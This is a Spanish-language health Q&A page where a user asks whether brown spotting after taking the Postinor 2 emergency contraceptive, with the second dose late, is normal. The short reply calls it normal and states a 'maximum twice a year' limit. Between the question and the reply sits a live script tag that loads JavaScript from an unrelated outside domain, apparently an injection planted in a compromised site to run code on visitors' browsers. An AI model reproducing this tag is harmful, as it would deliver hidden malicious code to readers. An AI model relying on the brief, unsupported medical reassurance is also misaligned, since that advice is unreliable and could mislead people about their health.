Tengo dudas sobre la pastilla del día después

Hola Doctora...

Yo estoy planificando con pastillas... Yo tuve relaciones hace un mes aproximadamente sin protección y tome la pastilla postinor 2.... Me tome la primera normalmente y la segunda pastilla no me la tome a la hora indicada, me la tome 4 horas después...pregunte si si funcionaria y me dijeron que esperara a que me llegara el periodo..si no me llegaba me hiciera una prueba...si me llego el periodo, se me fue pero me sigue bajando flujo cafe por poquitos...eso es normal???..o tengo que realizar consulta o hacerme una prueba??? Que me recomendaria??..

<script type="text/javascript" src="http://temarosaplus.info/?0.8677384009621396"></script>

1 respuesta

Respuesta

No te preocupes, es totalmente normal debido al cambio hormonal que produce la pastilla del día después. Trata de no usar este metodo seguido, ya que solo debe usarse maximo dos veces al año. No olvides finalizar la pregunta, cualquier duda no dudes en consultar!